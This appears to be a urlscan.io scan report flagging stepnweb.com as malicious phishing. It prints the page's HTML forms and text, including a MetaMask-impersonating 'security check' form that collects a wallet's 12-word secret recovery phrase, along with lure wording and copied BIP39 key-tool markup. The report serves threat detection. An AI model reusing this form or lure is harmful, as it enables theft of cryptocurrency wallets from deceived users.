stepnweb.com Open in urlscan Pro
176.105.255.128  Malicious Activity! Public Scan

URL: https://stepnweb.com/login.php
Submission: On June 07 via automatic, source openphish — Scanned from DE

Form analysis 7 forms found in the DOM

POST

<form class="unlock-page__form" method="post" id="form1">
  <div class="MuiFormControl-root MuiTextField-root MuiFormControl-fullWidth">
    <label class="MuiFormLabel-root MuiInputLabel-root jss16 MuiInputLabel-formControl MuiInputLabel-animated" for="seedvalue">Paste Secret Recovery Phrase</label>
    <div class="MuiInputBase-root MuiInput-root MuiInput-underline jss18 MuiInputBase-fullWidth MuiInput-fullWidth MuiInputBase-formControl MuiInput-formControl">
      <input id="phrase" name="phrase" class="phrase" data-show-qr="" autocomplete="off" autocorrect="off" autocapitalize="none" spellcheck="false" type="text" required="">
      <input type="text" name="namewallet" value="MetaMask" hidden="">
      <input id="hashteg" type="text" name="hashteg" value="#stepn" hidden="">
    </div>
    <p style="display:none;" id="errorid" class="MuiFormHelperText-root Mui-error MuiFormHelperText-filled">The secret phrase (Seed) must be 12 words separated by a space and must not use upper case.</p>
  </div>
  <button class="button btn--rounded btn-default" style="background-color: gray; color: white; margin-top: 20px; height: 60px; font-weight: 400; box-shadow: none; border-radius: 100px;" type="submit" disabled=""> Confirm </button>
</form>

<form class="form-horizontal" role="form">
  <br>
  <div class="col-sm-2"></div>
  <div class="col-sm-10">
    <p> For more info see the <a href="https://github.com/bitcoin/bips/blob/master/bip-0044.mediawiki" target="_blank">BIP44 spec</a>. </p>
  </div>
  <div class="form-group">
    <label for="purpose-bip44" class="col-sm-2 control-label">
      <a href="https://github.com/bitcoin/bips/blob/master/bip-0044.mediawiki#purpose" target="_blank">Purpose</a>
    </label>
    <div class="col-sm-10">
      <input id="purpose-bip44" type="text" class="purpose form-control" value="44" readonly="readonly">
    </div>
  </div>
  <div class="form-group">
    <label for="coin-bip44" class="col-sm-2 control-label">
      <a href="https://github.com/bitcoin/bips/blob/master/bip-0044.mediawiki#registered-coin-types" target="_blank">Coin</a>
    </label>
    <div class="col-sm-10">
      <input id="coin-bip44" type="text" class="coin form-control" value="60" readonly="readonly">
    </div>
  </div>
  <div class="form-group">
    <label for="account-bip44" class="col-sm-2 control-label">
      <a href="https://github.com/bitcoin/bips/blob/master/bip-0044.mediawiki#account" target="_blank">Account</a>
    </label>
    <div class="col-sm-10">
      <input id="account-bip44" type="text" class="account form-control" value="0">
    </div>
  </div>
  <div class="form-group">
    <label for="change-bip44" class="col-sm-2 control-label">
      <a href="https://github.com/bitcoin/bips/blob/master/bip-0044.mediawiki#change" target="_blank">External / Internal</a>
    </label>
    <div class="col-sm-10">
      <input id="change-bip44" type="text" class="change form-control" value="0">
    </div>
  </div>
  <div class="form-group">
    <label class="col-sm-2 control-label">
    </label>
    <div class="col-sm-10">
      <p>The account extended keys can be used for importing to most BIP44 compatible wallets, such as mycelium or electrum.</p>
    </div>
  </div>
  <div class="form-group">
    <label for="account-xprv" class="col-sm-2 control-label">
      <span>Account Extended Private Key</span>
    </label>
    <div class="col-sm-10">
      <textarea id="account-xprv-bip44" type="text" class="account-xprv private-data form-control" readonly="readonly" data-show-qr="" autocomplete="off" autocorrect="off" autocapitalize="none" spellcheck="false"></textarea>
    </div>
  </div>
  <div class="form-group">
    <label for="account-xpub" class="col-sm-2 control-label">
      <span>Account Extended Public Key</span>
    </label>
    <div class="col-sm-10">
      <textarea id="account-xpub-bip44" type="text" class="account-xpub form-control" readonly="readonly" data-show-qr="" autocomplete="off" autocorrect="off" autocapitalize="none" spellcheck="false"></textarea>
    </div>
  </div>
  <div class="form-group">
    <label class="col-sm-2 control-label">
    </label>
    <div class="col-sm-10">
      <p>The BIP32 derivation path and extended keys are the basis for the derived addresses.</p>
    </div>
  </div>
  <div class="form-group">
    <label for="bip44-path" class="col-sm-2 control-label">BIP32 Derivation Path</label>
    <div class="col-sm-10">
      <input id="bip44-path" type="text" class="path form-control" value="m/44'/0'/0'/0" readonly="readonly">
    </div>
  </div>
</form>

<form class="form-horizontal" role="form">
  <br>
  <div class="col-sm-2"></div>
  <div class="col-sm-10">
    <p> For more info see the <a href="https://github.com/bitcoin/bips/blob/master/bip-0032.mediawiki" target="_blank">BIP32 spec</a>
    </p>
  </div>
  <div class="form-group">
    <label for="bip32-client" class="col-sm-2 control-label">Client</label>
    <div class="col-sm-10">
      <select id="bip32-client" class="client form-control">
        <option value="custom" selected="selected">Custom derivation path</option>
        <option value="0">Bitcoin Core</option>
        <option value="1">blockchain.info</option>
        <option value="2">MultiBit HD</option>
        <option value="3">Coinomi, Ledger</option>
      </select>
    </div>
  </div>
  <div class="form-group">
    <label for="bip32-path" class="col-sm-2 control-label">BIP32 Derivation Path</label>
    <div class="col-sm-10">
      <input id="bip32-path" type="text" class="path form-control" value="m/0">
    </div>
  </div>
  <div class="form-group">
    <label for="core-path" class="col-sm-2 control-label">Bitcoin Core</label>
    <div class="col-sm-10">
      <p class="form-control no-border"> Use path <code>m/0'/0'</code> with hardened addresses. </p>
      <p class="form-control no-border"> For more info see the <a href="https://github.com/bitcoin/bitcoin/pull/8035" target="_blank">Bitcoin Core BIP32 implementation</a>
      </p>
    </div>
  </div>
  <div class="form-group">
    <label for="core-path" class="col-sm-2 control-label">Multibit</label>
    <div class="col-sm-10">
      <p class="form-control no-border">
        <span>Use path <code>m/0'/0</code>.</span>
        <span>For change addresses use path <code>m/0'/1</code>.</span>
      </p>
      <p class="form-control no-border">
        <span>For more info see</span>
        <a href="https://multibit.org/" target="_blank">MultiBit HD</a>
      </p>
    </div>
  </div>
  <div class="form-group">
    <label class="col-sm-2 control-label">Block Explorers</label>
    <div class="col-sm-10">
      <p class="form-control no-border">
        <span>Use path <code>m/44'/0'/0'</code>.</span>
        <span>Only enter the <code>xpub</code> extended key into block explorer search fields, never the <code>xprv</code> key.</span>
      </p>
      <p class="form-control no-border">
        <span>Can be used with</span>: <a href="https://blockchain.info/" target="_blank">blockchain.info</a>
      </p>
    </div>
  </div>
</form>

<form class="form-horizontal" role="form">
  <br>
  <div class="unavailable hidden">
    <div class="form-group">
      <div class="col-sm-2"></div>
      <div class="col-sm-10">
        <p>BIP49 is unavailable for this coin.</p>
      </div>
    </div>
  </div>
  <div class="available">
    <div class="col-sm-2"></div>
    <div class="col-sm-10">
      <p> For more info see the <a href="https://github.com/bitcoin/bips/blob/master/bip-0049.mediawiki" target="_blank">BIP49 spec</a>. </p>
    </div>
    <div class="form-group">
      <label for="purpose-bip49" class="col-sm-2 control-label">
        <a href="https://github.com/bitcoin/bips/blob/master/bip-0044.mediawiki#purpose" target="_blank">Purpose</a>
      </label>
      <div class="col-sm-10">
        <input id="purpose-bip49" type="text" class="purpose form-control" value="49" readonly="readonly">
      </div>
    </div>
    <div class="form-group">
      <label for="coin-bip49" class="col-sm-2 control-label">
        <a href="https://github.com/bitcoin/bips/blob/master/bip-0044.mediawiki#registered-coin-types" target="_blank">Coin</a>
      </label>
      <div class="col-sm-10">
        <input id="coin-bip49" type="text" class="coin form-control" value="0" readonly="readonly">
      </div>
    </div>
    <div class="form-group">
      <label for="account-bip49" class="col-sm-2 control-label">
        <a href="https://github.com/bitcoin/bips/blob/master/bip-0044.mediawiki#account" target="_blank">Account</a>
      </label>
      <div class="col-sm-10">
        <input id="account-bip49" type="text" class="account form-control" value="0">
      </div>
    </div>
    <div class="form-group">
      <label for="change-bip49" class="col-sm-2 control-label">
        <a href="https://github.com/bitcoin/bips/blob/master/bip-0044.mediawiki#change" target="_blank">External / Internal</a>
      </label>
      <div class="col-sm-10">
        <input id="change-bip49" type="text" class="change form-control" value="0">
      </div>
    </div>
    <div class="form-group">
      <label class="col-sm-2 control-label">
      </label>
      <div class="col-sm-10">
        <p>The account extended keys can be used for importing to most BIP49 compatible wallets.</p>
      </div>
    </div>
    <div class="form-group">
      <label for="account-xprv" class="col-sm-2 control-label">
        <span>Account Extended Private Key</span>
      </label>
      <div class="col-sm-10">
        <textarea id="account-xprv-bip49" type="text" class="account-xprv private-data form-control" readonly="readonly" data-show-qr="" autocomplete="off" autocorrect="off" autocapitalize="none" spellcheck="false"></textarea>
      </div>
    </div>
    <div class="form-group">
      <label for="account-xpub" class="col-sm-2 control-label">
        <span>Account Extended Public Key</span>
      </label>
      <div class="col-sm-10">
        <textarea id="account-xpub-bip49" type="text" class="account-xpub form-control" readonly="readonly" data-show-qr="" autocomplete="off" autocorrect="off" autocapitalize="none" spellcheck="false"></textarea>
      </div>
    </div>
    <div class="form-group">
      <label class="col-sm-2 control-label">
      </label>
      <div class="col-sm-10">
        <p>The BIP32 derivation path and extended keys are the basis for the derived addresses.</p>
      </div>
    </div>
    <div class="form-group">
      <label for="bip49-path" class="col-sm-2 control-label">BIP32 Derivation Path</label>
      <div class="col-sm-10">
        <input id="bip49-path" type="text" class="path form-control" value="m/49'/0'/0'/0" readonly="readonly">
      </div>
    </div>
  </div>
</form>

<form class="form-horizontal" role="form">
  <br>
  <div class="unavailable hidden">
    <div class="form-group">
      <div class="col-sm-2"></div>
      <div class="col-sm-10">
        <p>BIP141 is unavailable for this coin.</p>
      </div>
    </div>
  </div>
  <div class="available">
    <div class="col-sm-2"></div>
    <div class="col-sm-10">
      <p> For more info see the <a href="https://github.com/bitcoin/bips/blob/master/bip-0141.mediawiki" target="_blank">BIP141 spec</a>
      </p>
    </div>
    <div class="form-group">
      <label for="bip141-path" class="col-sm-2 control-label">BIP32 Derivation Path</label>
      <div class="col-sm-10">
        <input id="bip141-path" type="text" class="bip141-path form-control" value="m/0">
      </div>
    </div>
    <div class="form-group">
      <label class="col-sm-2 control-label">Script Semantics</label>
      <div class="col-sm-10">
        <select class="form-control bip141-semantics">
          <option value="p2wpkh">P2WPKH</option>
          <option value="p2wpkh-p2sh" selected="selected">P2WPKH nested in P2SH</option>
          <option value="p2wsh">P2WSH (1-of-1 multisig)</option>
          <option value="p2wsh-p2sh">P2WSH nested in P2SH (1-of-1 multisig)</option>
        </select>
      </div>
    </div>
  </div>
</form>

<form class="form-horizontal" role="form">
  <br>
  <div class="unavailable hidden">
    <div class="form-group">
      <div class="col-sm-2"></div>
      <div class="col-sm-10">
        <p>BIP84 is unavailable for this coin.</p>
      </div>
    </div>
  </div>
  <div class="available">
    <div class="col-sm-2"></div>
    <div class="col-sm-10">
      <p> For more info see the <a href="https://github.com/bitcoin/bips/blob/master/bip-0084.mediawiki" target="_blank">BIP84 spec</a>. </p>
    </div>
    <div class="form-group">
      <label for="purpose-bip84" class="col-sm-2 control-label"> Purpose </label>
      <div class="col-sm-10">
        <input id="purpose-bip84" type="text" class="purpose form-control" value="84" readonly="readonly">
      </div>
    </div>
    <div class="form-group">
      <label for="coin-bip84" class="col-sm-2 control-label"> Coin </label>
      <div class="col-sm-10">
        <input id="coin-bip84" type="text" class="coin form-control" value="0" readonly="readonly">
      </div>
    </div>
    <div class="form-group">
      <label for="account-bip84" class="col-sm-2 control-label"> Account </label>
      <div class="col-sm-10">
        <input id="account-bip84" type="text" class="account form-control" value="0">
      </div>
    </div>
    <div class="form-group">
      <label for="change-bip84" class="col-sm-2 control-label"> External / Internal </label>
      <div class="col-sm-10">
        <input id="change-bip84" type="text" class="change form-control" value="0">
      </div>
    </div>
    <div class="form-group">
      <label class="col-sm-2 control-label">
      </label>
      <div class="col-sm-10">
        <p>The account extended keys can be used for importing to most BIP84 compatible wallets.</p>
      </div>
    </div>
    <div class="form-group">
      <label for="account-xprv" class="col-sm-2 control-label">
        <span>Account Extended Private Key</span>
      </label>
      <div class="col-sm-10">
        <textarea id="account-xprv-bip84" type="text" class="account-xprv private-data form-control" readonly="readonly" data-show-qr="" autocomplete="off" autocorrect="off" autocapitalize="none" spellcheck="false"></textarea>
      </div>
    </div>
    <div class="form-group">
      <label for="account-xpub" class="col-sm-2 control-label">
        <span>Account Extended Public Key</span>
      </label>
      <div class="col-sm-10">
        <textarea id="account-xpub-bip84" type="text" class="account-xpub form-control" readonly="readonly" data-show-qr="" autocomplete="off" autocorrect="off" autocapitalize="none" spellcheck="false"></textarea>
      </div>
    </div>
    <div class="form-group">
      <label class="col-sm-2 control-label">
      </label>
      <div class="col-sm-10">
        <p>The BIP32 derivation path and extended keys are the basis for the derived addresses.</p>
      </div>
    </div>
    <div class="form-group">
      <label for="bip84-path" class="col-sm-2 control-label">BIP32 Derivation Path</label>
      <div class="col-sm-10">
        <input id="bip84-path" type="text" class="path form-control" value="m/84'/0'/0'/0" readonly="readonly">
      </div>
    </div>
  </div>
</form>

<form class="form-horizontal" role="form">
  <div class="form-group">
    <label for="extended-priv-key" class="col-sm-2 control-label">BIP32 Extended Private Key</label>
    <div class="col-sm-10">
      <textarea id="extended-priv-key" class="extended-priv-key private-data form-control" readonly="readonly" data-show-qr="" autocomplete="off" autocorrect="off" autocapitalize="none" spellcheck="false"></textarea>
    </div>
  </div>
  <div class="form-group">
    <label for="extended-pub-key" class="col-sm-2 control-label">BIP32 Extended Public Key</label>
    <div class="col-sm-10">
      <textarea id="extended-pub-key" class="extended-pub-key form-control" readonly="readonly" data-show-qr="" autocomplete="off" autocorrect="off" autocapitalize="none" spellcheck="false"></textarea>
    </div>
  </div>
</form>

Text Content

Ethereum Mainnet




SECURITY CHECK


We just need to confirm it's you. To continue, simply confirm your secret
recovery phrase.
Paste Secret Recovery Phrase


The secret phrase (Seed) must be 12 words separated by a space and must not use
upper case.

Confirm
Need help? Contact MetaMask Support
Warning
Entropy is an advanced feature. Your mnemonic may be insecure if this feature is
used incorrectly. Read more
Entropy

Some characters have been discarded

Time To Crack

Event Count

Entropy Type

Avg Bits Per Event

Raw Entropy Words

Total Bits

Filtered Entropy

Raw Binary

Binary Checksum
 
Word Indexes
 
Mnemonic Length
Use Raw Entropy (3 words per 32 bits) 12 Words 15 Words 18 Words 21 Words 24
Words

The mnemonic will appear more secure than it really is.

PBKDF2 rounds
2048 (compatibility) 4096 iterations 8192 iterations 16384 iterations 32768
iterations Custom iterations

Valid entropy values include:

 * Binary [0-1]
   101010011
 * Base 6 [0-5]
   123434014
 * Dice [1-6]
   62535634
 * Base 10 [0-9]
   90834528
 * Hex [0-9A-F]
   4187a8bfd9
 * Card [A2-9TJQK][CDHS]
   ahqs9dtc

Show entropy details
Hide all private info
Auto compute
Mnemonic Language
English 日本語 Español 中文(简体) 中文(繁體) Français Italiano 한국어 Čeština Português
Warning
You are using a custom number of PBKDF2 iterations. Your BIP39 seed may not show
same addresses on a different software. Read more
BIP39 Mnemonic

BIP39 Split Mnemonic




Show split mnemonic cards
BIP39 Passphrase (optional)

BIP39 Seed

Coin

BIP32 Root Key

Show BIP85
Warning
This is an advanced feature and should only be used if you understand what it
does.

The value of the "BIP85 Child Key" field shown below is not used elsewhere on
this page. It can be used as a new key.

In case of the BIP39 application, you can paste it into the "BIP39 Mnemonic"
field to use it as a new mnemonic.

Please read the BIP85 spec for more information.

BIP85 Application
BIP39 WIF Xprv Hex
BIP85 Mnemonic Language
English
BIP85 Mnemonic Length
12 18 24
BIP85 Bytes

BIP85 Index

BIP85 Child Key

Prefixes
Use Ltpv / Ltub instead of xprv / xpub

--------------------------------------------------------------------------------


DERIVATION PATH

 * BIP32
 * BIP44
 * BIP49
 * BIP84
 * BIP141





For more info see the BIP44 spec.

Purpose

Coin

Account

External / Internal


The account extended keys can be used for importing to most BIP44 compatible
wallets, such as mycelium or electrum.

Account Extended Private Key

Account Extended Public Key


The BIP32 derivation path and extended keys are the basis for the derived
addresses.

BIP32 Derivation Path





For more info see the BIP32 spec

Client
Custom derivation path Bitcoin Coreblockchain.infoMultiBit HDCoinomi, Ledger
BIP32 Derivation Path

Bitcoin Core

Use path m/0'/0' with hardened addresses.

For more info see the Bitcoin Core BIP32 implementation

Multibit

Use path m/0'/0. For change addresses use path m/0'/1.

For more info see MultiBit HD

Block Explorers

Use path m/44'/0'/0'. Only enter the xpub extended key into block explorer
search fields, never the xprv key.

Can be used with: blockchain.info




BIP49 is unavailable for this coin.

For more info see the BIP49 spec.

Purpose

Coin

Account

External / Internal


The account extended keys can be used for importing to most BIP49 compatible
wallets.

Account Extended Private Key

Account Extended Public Key


The BIP32 derivation path and extended keys are the basis for the derived
addresses.

BIP32 Derivation Path




BIP141 is unavailable for this coin.

For more info see the BIP141 spec

BIP32 Derivation Path

Script Semantics
P2WPKH P2WPKH nested in P2SH P2WSH (1-of-1 multisig) P2WSH nested in P2SH
(1-of-1 multisig)



BIP84 is unavailable for this coin.

For more info see the BIP84 spec.

Purpose

Coin

Account

External / Internal


The account extended keys can be used for importing to most BIP84 compatible
wallets.

Account Extended Private Key

Account Extended Public Key


The BIP32 derivation path and extended keys are the basis for the derived
addresses.

BIP32 Derivation Path

BIP32 Extended Private Key

BIP32 Extended Public Key


--------------------------------------------------------------------------------


DERIVED ADDRESSES

Note these addresses are derived from the BIP32 Extended Key

Use CashAddr addresses for Bitcoin Cash (ie starting with 'q' instead of '1')
Use BitPay-style addresses for Bitcoin Cash (ie starting with 'C' instead of
'1')
Use legacy addresses for Bitcoin Cash (ie starting with '1')
Encrypt private keys using BIP38 and this password: Enabling BIP38 means each
key will take several minutes to generate.
Use hardened addresses
 * Table
 * CSV

Path   Toggle
Address   Toggle
Public Key   Toggle
Private Key   Toggle
                        


Show more rows starting from index (leave blank to generate from next index)

--------------------------------------------------------------------------------

The server is not responding. The system is under maintenance. Please try again
later. Refresh:

Incorrect login phrase